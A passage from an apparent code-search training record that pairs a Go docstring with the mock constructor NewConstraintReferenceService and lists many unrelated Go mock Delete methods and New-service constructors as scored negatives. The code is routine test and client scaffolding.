{\n\t\t\t_context[k] = v\n\t\t}\n\t} else if len(_opt) == 2 {\n\t\tfor k := range _context {\n\t\t\tdelete(_context, k)\n\t\t}\n\t\tfor k, v := range _resp.Context {\n\t\t\t_context[k] = v\n\t\t}\n\t\tfor k := range _status {\n\t\t\tdelete(_status, k)\n\t\t}\n\t\tfor k, v := range _resp.Status {\n\t\t\t_status[k] = v\n\t\t}\n\n\t}\n\t_ = length\n\t_ = have\n\t_ = ty\n\treturn ret, nil\n}", "func TestRemoveByIDCorrectData(t *testing.T) {\n\tcMock := getMock()\n\tcMock.On(\"DeleteAnswerByID\", answerToRemoveID).Return(nil)\n\n\tbody := []byte(\"{\\\"id\\\": 1}\")\n\terr := RemoveDELETE(body)\n\tassert.Nil(t, err)\n}", "func (_m *MockStore) Delete(ctx context.Context, key string, opts ...store.DeleteOption) error {\n\t_va := make([]interface{}, len(opts))\n\tfor _i := range opts {\n\t\t_va[_i] = opts[_i]\n\t}\n\tvar _ca []interface{}\n\t_ca = append(_ca, ctx, key)\n\t_ca = append(_ca, _va...)\n\tret := _m.Called(_ca...)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, ...store.DeleteOption) error); ok {\n\t\tr0 = rf(ctx, key, opts...)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *Repository) DeleteCandidate(ctx context.Context, id uint64) error {\n\tret := _m.Called(ctx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, uint64) error); ok {\n\t\tr0 = rf(ctx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *AccountsClientMock) Delete(ctx context.Context, resourceGroupName string, accountName string) *retry.Error {\n\treturn nil\n}", "func (m *MockVirtualMeshCertificateSigningRequestClient) DeleteAllOfVirtualMeshCertificateSigningRequest(ctx context.Context, opts ...client.DeleteAllOfOption) error {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{ctx}\n\tfor _, a := range opts {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"DeleteAllOfVirtualMeshCertificateSigningRequest\", varargs...)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (_m *SessionManagerClient) Delete(ctx context.Context, in *mnemosynerpc.DeleteRequest, opts ...grpc.CallOption) (*mnemosynerpc.DeleteResponse, error) {\n\tret := _m.Called(ctx, in, opts)\n\n\tvar r0 *mnemosynerpc.DeleteResponse\n\tif rf, ok := ret.Get(0).(func(context.Context, *mnemosynerpc.DeleteRequest, ...grpc.CallOption) *mnemosynerpc.DeleteResponse); ok {\n\t\tr0 = rf(ctx, in, opts...)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*mnemosynerpc.DeleteResponse)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(context.Context, *mnemosynerpc.DeleteRequest, ...grpc.CallOption) error); ok {\n\t\tr1 = rf(ctx, in, opts...)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (m *ThreatAssessmentRequestsThreatAssessmentRequestItemRequestBuilder) Delete(ctx context.Context, requestConfiguration *ThreatAssessmentRequestsThreatAssessmentRequestItemRequestBuilderDeleteRequestConfiguration)(error) {\n requestInfo, err := m.ToDeleteRequestInformation(ctx, requestConfiguration);\n if err != nil {\n return err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": ia572726a95efa92ddd544552cd950653dc691023836923576b2f4bf716cf204a.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": ia572726a95efa92ddd544552cd950653dc691023836923576b2f4bf716cf204a.CreateODataErrorFromDiscriminatorValue,\n }\n err = m.BaseRequestBuilder.RequestAdapter.SendNoContent(ctx, requestInfo, errorMapping)\n if err != nil {\n return err\n }\n return nil\n}", "func (m *Client) Delete(arg0 context.Context, arg1 string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Delete\", arg0, arg1)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (_m *helmClient) Delete(_a0 internal.ReleaseName, _a1 internal.Namespace) error {\n\tret := _m.Called(_a0, _a1)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(internal.ReleaseName, internal.Namespace) error); ok {\n\t\tr0 = rf(_a0, _a1)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *Repository) Delete(k string) error {\n\tret := _m.Called(k)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string) error); ok {\n\t\tr0 = rf(k)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (client *MockClient) Delete(context ctx.Context, object ctrlClient.Object, options ...ctrlClient.DeleteOption) error {\n\tkindKey, err := buildKindKey(object)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclient.fillInMaps(kindKey)\n\n\tobjectKey, err := buildRuntimeObjectKey(object)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = client.checkPresence(kindKey, objectKey)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tstuckTerminating := client.stuckTerminatingObjects != nil && client.stuckTerminatingObjects[kindKey] != nil && client.stuckTerminatingObjects[kindKey][objectKey]\n\tif !stuckTerminating {\n\t\tdelete(client.data[kindKey], objectKey)\n\t}\n\n\treturn nil\n}", "func MockForceDeleteResponse(t *testing.T) {\n\tth.Mux.HandleFunc(shareEndpoint+\"/\"+shareID+\"/action\", func(w http.ResponseWriter, r *http.Request) {\n\t\tth.TestMethod(t, r, \"POST\")\n\t\tth.TestHeader(t, r, \"X-Auth-Token\", fake.TokenID)\n\t\tth.TestHeader(t, r, \"Content-Type\", \"application/json\")\n\t\tth.TestHeader(t, r, \"Accept\", \"application/json\")\n\t\tth.TestJSONRequest(t, r, forceDeleteRequest)\n\t\tw.Header().Add(\"Content-Type\", \"application/json\")\n\t\tw.WriteHeader(http.StatusAccepted)\n\t})\n}", "func (_m *MockRepository) Delete(bookCopyID string) error {\n\tret := _m.Called(bookCopyID)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string) error); ok {\n\t\tr0 = rf(bookCopyID)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockFlag) Delete(arg0 context.Context, arg1 string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Delete\", arg0, arg1)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (m *IDXKeyRepository) DeleteByKey(arg0 context.Context, arg1 string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"DeleteByKey\", arg0, arg1)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func MockDeleteMetadatumResponse(t *testing.T, key string) {\n\tth.Mux.HandleFunc(shareEndpoint+\"/\"+shareID+\"/metadata/\"+key, func(w http.ResponseWriter, r *http.Request) {\n\t\tth.TestMethod(t, r, \"DELETE\")\n\t\tth.TestHeader(t, r, \"X-Auth-Token\", fake.TokenID)\n\t\tw.WriteHeader(http.StatusOK)\n\t})\n}", "func (_m *RediStore) Delete(r *http.Request, w http.ResponseWriter, session *sessions.Session) error {\n\tret := _m.Called(r, w, session)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(*http.Request, http.ResponseWriter, *sessions.Session) error); ok {\n\t\tr0 = rf(r, w, session)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *Client) DeleteTicketForm(arg0 context.Context, arg1 int64) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"DeleteTicketForm\", arg0, arg1)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (_m *MockToolchainService) DeleteToolchainIntegration(name string) error {\n\tret := _m.Called(name)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string) error); ok {\n\t\tr0 = rf(name)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *KV) DeleteTree(prefix string, w *api.WriteOptions) (*api.WriteMeta, error) {\n\tret := _m.Called(prefix, w)\n\n\tvar r0 *api.WriteMeta\n\tif rf, ok := ret.Get(0).(func(string, *api.WriteOptions) *api.WriteMeta); ok {\n\t\tr0 = rf(prefix, w)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*api.WriteMeta)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(string, *api.WriteOptions) error); ok {\n\t\tr1 = rf(prefix, w)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (m *PayloadResponseItemRequestBuilder) Delete(ctx context.Context, requestConfiguration *PayloadResponseItemRequestBuilderDeleteRequestConfiguration)(error) {\n requestInfo, err := m.ToDeleteRequestInformation(ctx, requestConfiguration);\n if err != nil {\n return err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n }\n err = m.BaseRequestBuilder.RequestAdapter.SendNoContent(ctx, requestInfo, errorMapping)\n if err != nil {\n return err\n }\n return nil\n}", "func (m *MockRouter) DELETE(path string, handler interface{}, options ...interface{}) {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{path, handler}\n\tfor _, a := range options {\n\t\tvarargs = append(varargs, a)\n\t}\n\tm.ctrl.Call(m, \"DELETE\", varargs...)\n}", "func (_m *PostRepository) Delete(post *domain.Post) error {\n\tret := _m.Called(post)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(*domain.Post) error); ok {\n\t\tr0 = rf(post)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockTenantServiceVolumeDao) DeleteModel(serviceID string, arg ...interface{}) error {\n\tvarargs := []interface{}{serviceID}\n\tfor _, a := range arg {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"DeleteModel\", varargs...)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (client BaseClient) DeleteExpectation(ctx context.Context, pathParameter string) (result String, err error) {\n\tif err := validation.Validate([]validation.Validation{\n\t\t{TargetValue: pathParameter,\n\t\t\tConstraints: []validation.Constraint{{Target: \"pathParameter\", Name: validation.Pattern, Rule: `.*`, Chain: nil}}}}); err != nil {\n\t\treturn result, validation.NewError(\"beacon.BaseClient\", \"DeleteExpectation\", err.Error())\n\t}\n\n\treq, err := client.DeleteExpectationPreparer(ctx, pathParameter)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"beacon.BaseClient\", \"DeleteExpectation\", nil, \"Failure preparing request\")\n\t\treturn\n\t}\n\n\tresp, err := client.DeleteExpectationSender(req)\n\tif err != nil {\n\t\tresult.Response = autorest.Response{Response: resp}\n\t\terr = autorest.NewErrorWithError(err, \"beacon.BaseClient\", \"DeleteExpectation\", resp, \"Failure sending request\")\n\t\treturn\n\t}\n\n\tresult, err = client.DeleteExpectationResponder(resp)\n\tif err != nil {\n\t\terr = autorest.NewErrorWithError(err, \"beacon.BaseClient\", \"DeleteExpectation\", resp, \"Failure responding to request\")\n\t}\n\n\treturn\n}", "func (_m *NuclioFunctionEventInterface) Delete(ctx context.Context, name string, opts v1.DeleteOptions) error {\n\tret := _m.Called(ctx, name, opts)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, v1.DeleteOptions) error); ok {\n\t\tr0 = rf(ctx, name, opts)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockAuthCheckerClient) Delete(arg0 context.Context, arg1 *auth.SessionToken, arg2 ...grpc.CallOption) (*auth.Nothing, error) {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{arg0, arg1}\n\tfor _, a := range arg2 {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"Delete\", varargs...)\n\tret0, _ := ret[0].(*auth.Nothing)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (_m *Client) DeleteDefinition(_a0 context.Context, _a1 build.DeleteDefinitionArgs) error {\n\tret := _m.Called(_a0, _a1)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, build.DeleteDefinitionArgs) error); ok {\n\t\tr0 = rf(_a0, _a1)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *MockInterface) BatchDelete(ctx context.Context, keys []string) error {\n\tret := _m.Called(ctx, keys)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, []string) error); ok {\n\t\tr0 = rf(ctx, keys)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *CacheManager) Delete(key string) (*objects.Object, error) {\n\tret := _m.Called(key)\n\n\tvar r0 *objects.Object\n\tif rf, ok := ret.Get(0).(func(string) *objects.Object); ok {\n\t\tr0 = rf(key)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*objects.Object)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(string) error); ok {\n\t\tr1 = rf(key)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}" ]
[ "0.6036101", "0.60064006", "0.5893598", "0.581268", "0.57082725", "0.56985646", "0.5678859", "0.5655733", "0.5650084", "0.56484133", "0.5645776", "0.5601811", "0.55741787", "0.5523782", "0.5514463", "0.5486046", "0.54723054", "0.5457707", "0.5447327", "0.5446301", "0.544352", "0.5423963", "0.5422181", "0.54218066", "0.54149926", "0.5397961", "0.5376905", "0.537681", "0.5369558", "0.5369558", "0.53640467", "0.5362858", "0.53592026", "0.5328602", "0.53247267", "0.5323215", "0.5320521", "0.5312971", "0.53127706", "0.5311486", "0.5304669", "0.53045255", "0.5301671", "0.5295497", "0.52918637", "0.5287544", "0.52834105", "0.5281172", "0.5269126", "0.5260897", "0.5259466", "0.5246683", "0.5240952", "0.52366084", "0.5236041", "0.52352744", "0.5222956", "0.5218501", "0.5218159", "0.5217366", "0.521325", "0.52093494", "0.5202186", "0.51987827", "0.5196018", "0.5192502", "0.51898", "0.518746", "0.5184988", "0.51844686", "0.51800466", "0.5165866", "0.5163517", "0.5160793", "0.5160326", "0.5155449", "0.5153061", "0.5149295", "0.51479703", "0.51454127", "0.51423347", "0.5142107", "0.5127542", "0.5121024", "0.51012415", "0.5100603", "0.5100288", "0.5098391", "0.5097619", "0.50965214", "0.50954765", "0.50948143", "0.5088548", "0.5087488", "0.5081958", "0.5078354", "0.507559", "0.50714207", "0.5065752", "0.50633633" ]
0.6998396
0
NewConstraintReferenceService creates a new instance of ConstraintReferenceService. It also registers a testing interface on the mock and a cleanup function to assert the mocks expectations.
func NewConstraintReferenceService(t mockConstructorTestingTNewConstraintReferenceService) *ConstraintReferenceService { mock := &ConstraintReferenceService{} mock.Mock.Test(t) t.Cleanup(func() { mock.AssertExpectations(t) }) return mock }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func NewFormationConstraintSvc(t mockConstructorTestingTNewFormationConstraintSvc) *FormationConstraintSvc {\n\tmock := &FormationConstraintSvc{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func NewService(repo formationTemplateConstraintReferenceRepository, converter constraintReferenceConverter) *service {\n\treturn &service{\n\t\trepo: repo,\n\t\tconverter: converter,\n\t}\n}", "func NewService(t mockConstructorTestingTNewService) *Service {\n\tmock := &Service{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func NewService(t testing.TB) *Service {\n\tmock := &Service{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func NewRef(t *testing.T, kubeClient *kubeset.Clientset, testNamespace string) *JenkinsRef {\n\tsvc, err := kubeClient.CoreV1().Services(testNamespace).Get(context.Background(), \"jenkins\", metav1.GetOptions{})\n\tif err != nil {\n\t\tt.Fatalf(\"%#v\", err)\n\t}\n\tserviceIP := svc.Spec.ClusterIP\n\tport := svc.Spec.Ports[0].Port\n\n\tj := &JenkinsRef{\n\t\thost: serviceIP,\n\t\tport: fmt.Sprintf(\"%d\", port),\n\t\tnamespace: testNamespace,\n\t\turi_tester: NewTester(kubeClient, testNamespace, t),\n\t\tt: t,\n\t}\n\treturn j\n}", "func (r *ReconcileCanary) CreateServiceForTargetRef(instance *kharonv1alpha1.Canary) (*corev1.Service, error) {\n\t// We have to check if there is a Service called as the TargetRef.Name, otherwise create it\n\ttargetService := &corev1.Service{}\n\terr := r.client.Get(context.TODO(), types.NamespacedName{Name: instance.Spec.TargetRef.Name, Namespace: instance.Namespace}, targetService)\n\tif err != nil && errors.IsNotFound(err) {\n\t\tportName := instance.Spec.TargetRefContainerPort.StrVal\n\t\tif len(portName) <= 0 {\n\t\t\tportName = fmt.Sprintf(\"%d-%s\", instance.Spec.TargetRefContainerPort.IntVal, strings.ToLower(string(instance.Spec.TargetRefContainerProtocol)))\n\t\t}\n\t\t// The Service we need should be named as the Deployment because exposes the Deployment logic (as a canary)\n\t\ttargetServiceDef := &TargetServiceDef{\n\t\t\tserviceName: instance.Spec.TargetRef.Name,\n\t\t\tnamespace: instance.Namespace,\n\t\t\tselector: instance.Spec.TargetRefSelector,\n\t\t\tportName: portName,\n\t\t\tprotocol: instance.Spec.TargetRefContainerProtocol,\n\t\t\tport: instance.Spec.TargetRefContainerPort.IntVal,\n\t\t\ttargetPort: instance.Spec.TargetRefContainerPort,\n\t\t}\n\t\ttargetService = newServiceFromTargetServiceDef(targetServiceDef)\n\t\t// Set Canary instance as the owner and controller\n\t\tif err := controllerutil.SetControllerReference(instance, targetService, r.scheme); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tlog.Info(\"Creating the canary service\", \"CanaryService.Namespace\", targetService.Namespace, \"CanaryService.Name\", targetService.Name)\n\t\terr = r.client.Create(context.TODO(), targetService)\n\t\tif err != nil && !errors.IsAlreadyExists(err) {\n\t\t\treturn nil, err\n\t\t}\n\t} else if err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn targetService, nil\n}", "func New() (*ReferenceManager, error) {\n\treturn &ReferenceManager{\n\t\tHandler: admission.NewHandler(admission.Create, admission.Update),\n\t}, nil\n}", "func (_m *ConstraintReferenceService) Create(ctx context.Context, in *model.FormationTemplateConstraintReference) error {\n\tret := _m.Called(ctx, in)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, *model.FormationTemplateConstraintReference) error); ok {\n\t\tr0 = rf(ctx, in)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func newReference(refType ChannelType, properties map[string]edn.Serializable) (ref Reference, err error) {\n\n\tif properties == nil {\n\t\tproperties = make(map[string]edn.Serializable)\n\t}\n\n\tref = &refImpl{\n\t\trefType: refType,\n\t\tproperties: properties,\n\t}\n\n\treturn ref, err\n}", "func NewApplicationService(t mockConstructorTestingTNewApplicationService) *ApplicationService {\n\tmock := &ApplicationService{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func (s *service) Create(ctx context.Context, in *model.FormationTemplateConstraintReference) error {\n\tlog.C(ctx).Infof(\"Creating an Formation Template Constraint Reference for Constraint with ID %q and Formation Template with ID %q\", in.ConstraintID, in.FormationTemplateID)\n\n\tif err := s.repo.Create(ctx, in); err != nil {\n\t\treturn errors.Wrapf(err, \"while creating Formation Template Constraint Reference for Constraint with ID %q and Formation Template with ID %q\", in.ConstraintID, in.FormationTemplateID)\n\t}\n\n\treturn nil\n}", "func NewService(repo formationConstraintRepository, formationTemplateConstraintReferenceRepo formationTemplateConstraintReferenceRepository, uidSvc uidService, converter formationConstraintConverter) *service {\n\treturn &service{\n\t\trepo: repo,\n\t\tformationTemplateConstraintReferenceRepo: formationTemplateConstraintReferenceRepo,\n\t\tuidSvc: uidSvc,\n\t\tconverter: converter,\n\t}\n}", "func NewIdentityService(t mockConstructorTestingTNewIdentityService) *IdentityService {\n\tmock := &IdentityService{}\n\tmock.Mock.Test(t)\n\n\tt.Cleanup(func() { mock.AssertExpectations(t) })\n\n\treturn mock\n}", "func NewService(db *gorm.DB, client cortexCaller) domain.RuleService {\n\treturn &Service{\n\t\trepository: NewRepository(db),\n\t\ttemplateService: templates.NewService(db),\n\t\tclient: client,\n\t}\n}", "func NewReference(n asyncpi.Name) *Reference {\n\treturn &Reference{AttachType(n)}\n}", "func (f *factory) NewDepRef(w wallets.IWallet) (string, error) {\n\t// f.depRefMutex.Lock()\n\t// defer f.depRefMutex.Unlock()\n\tfor attempt := 0; attempt < 10; attempt++ {\n\t\tref := \"W-\"\n\t\tref += string('0' + rand.Intn(10))\n\t\tref += string('A' + rand.Intn(26))\n\t\tref += string('A' + rand.Intn(26))\n\t\tref += string('A' + rand.Intn(26))\n\t\tref += \"-\"\n\t\tref += string('0' + rand.Intn(10))\n\t\tref += string('A' + rand.Intn(26))\n\t\tref += string('A' + rand.Intn(26))\n\t\tref += string('A' + rand.Intn(26))\n\n\t\treturn \"\", log.Wrapf(nil, \"todo: dep ref not yet stored in db\")\n\t} //for each attempt\n\treturn \"\", log.Wrapf(nil, \"Unable to generate deposit reference\")\n}", "func TestNewService(t *testing.T) {\n\tt.Parallel()\n\n\ttype args struct {\n\t\tpathSVC pathUsecase.Service\n\t}\n\n\ttestCases := []struct {\n\t\tname string\n\t\targs args\n\t\twant Service\n\t}{\n\t\t{\n\t\t\tname: \"Happy path\",\n\t\t\targs: args{\n\t\t\t\tpathSVC: nil,\n\t\t\t},\n\t\t\twant: &serviceImpl{},\n\t\t},\n\t}\n\n\tfor _, tc := range testCases {\n\t\tt.Run(tc.name, func(t *testing.T) {\n\t\t\tif got := NewService(tc.args.pathSVC); !reflect.DeepEqual(got, tc.want) {\n\t\t\t\tt.Errorf(\"NewService(): %v, want: %v\", got, tc.want)\n\t\t\t}\n\t\t})\n\t}\n}", "func newService(rcvr interface{}, guard Guard) *service {\n\ts := new(service)\n\ts.typ = reflect.TypeOf(rcvr)\n\ts.rcvr = reflect.ValueOf(rcvr)\n\ts.name = reflect.Indirect(s.rcvr).Type().Name()\n\ts.guard = guard\n\n\t// install the methods\n\ts.method = suitableMethods(s.typ, true)\n\n\treturn s\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.LicenseAssignments = NewLicenseAssignmentsService(s)\n\treturn s, nil\n}", "func NewReferenceAdapter(\n\tprojectReference *gcpv1alpha1.ProjectReference,\n\tlogger logr.Logger, client client.Client,\n\tgcpClient gcpclient.Client,\n\tmanager condition.Conditions,\n\tcm configmap.OperatorConfigMap,\n) (*ReferenceAdapter, error) {\n\tprojectClaim, err := getMatchingClaimLink(projectReference, client)\n\tif err != nil {\n\t\treturn &ReferenceAdapter{}, err\n\t}\n\n\tr := &ReferenceAdapter{\n\t\tProjectClaim: projectClaim,\n\t\tProjectReference: projectReference,\n\t\tlogger: logger,\n\t\tkubeClient: client,\n\t\tgcpClient: gcpClient,\n\t\tconditionManager: manager,\n\t\tOperatorConfig: cm,\n\t}\n\treturn r, nil\n}", "func newServiceFromTargetServiceDef(targetServiceDef *TargetServiceDef) *corev1.Service {\n\tannotations := map[string]string{\n\t\t\"openshift.io/generated-by\": operatorName,\n\t}\n\treturn &corev1.Service{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: targetServiceDef.serviceName,\n\t\t\tNamespace: targetServiceDef.namespace,\n\t\t\tLabels: targetServiceDef.selector,\n\t\t\tAnnotations: annotations,\n\t\t},\n\t\tSpec: corev1.ServiceSpec{\n\t\t\tType: corev1.ServiceTypeClusterIP,\n\t\t\tSessionAffinity: corev1.ServiceAffinityNone,\n\t\t\tSelector: targetServiceDef.selector,\n\t\t\tPorts: []corev1.ServicePort{\n\t\t\t\t{\n\t\t\t\t\tName: targetServiceDef.portName,\n\t\t\t\t\tProtocol: targetServiceDef.protocol,\n\t\t\t\t\tPort: targetServiceDef.port,\n\t\t\t\t\tTargetPort: targetServiceDef.targetPort,\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n}", "func NewMock(middleware []Middleware) OrganizationService {\n\tvar svc OrganizationService = NewBasicOrganizationServiceServiceMock()\n\tfor _, m := range middleware {\n\t\tsvc = m(svc)\n\t}\n\treturn svc\n}", "func NewRef(ws string, path string, task string) Ref {\n\trefStr := path\n\n\tif ws != \"\" {\n\t\trefStr = ws + \":\" + path\n\t}\n\n\tif task != \"\" {\n\t\trefStr = refStr + \":\" + task\n\t}\n\n\treturn Ref(refStr)\n}", "func (r *QiskitPlaygroundReconciler) newServiceForPlayground(pg *qiskitv1alpha1.QiskitPlayground, labels *map[string]string) (*apiv1.Service, error) {\n\n\tservice := &apiv1.Service{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: pg.Name + \"-service\",\n\t\t\tNamespace: pg.Namespace,\n\t\t\tLabels: *labels,\n\t\t},\n\t\tSpec: apiv1.ServiceSpec{\n\t\t\tPorts: []apiv1.ServicePort{\n\t\t\t\t{\n\t\t\t\t\tName: \"http\",\n\t\t\t\t\tPort: 80,\n\t\t\t\t\tTargetPort: intstr.FromInt(8888),\n\t\t\t\t},\n\t\t\t},\n\t\t\tSelector: *labels,\n\t\t\tType: apiv1.ServiceTypeClusterIP,\n\t\t},\n\t}\n\n\tif pg.Spec.LoadBalancer && !r.IsOpenShift {\n\t\t// Our environment supports LoadBalancer service type and this is not OpenShift\n\t\tservice.Spec.Type = apiv1.ServiceTypeLoadBalancer\n\t}\n\n\t// SetControllerReference sets owner as a Controller OwnerReference on owned.\n\t// This is used for garbage collection of the owned object and for\n\t// reconciling the owner object on changes to owned (with a Watch + EnqueueRequestForOwner).\n\t// Since only one OwnerReference can be a controller, it returns an error if\n\t// there is another OwnerReference with Controller flag set.\n\tif err := controllerutil.SetControllerReference(pg, service, r.Scheme); err != nil {\n\t\treturn nil, err\n\t}\n\treturn service, nil\n}", "func New(client client.ConfigProvider) *Service {\n\treturn &Service{\n\t\tBus: bus.New(client),\n\t\tRule: rule.New(client),\n\t}\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, nil\n}", "func New(client *http.Client) (*Service, error) {\n\tif client == nil {\n\t\treturn nil, errors.New(\"client is nil\")\n\t}\n\ts := &Service{client: client, BasePath: basePath}\n\ts.Projects = NewProjectsService(s)\n\treturn s, 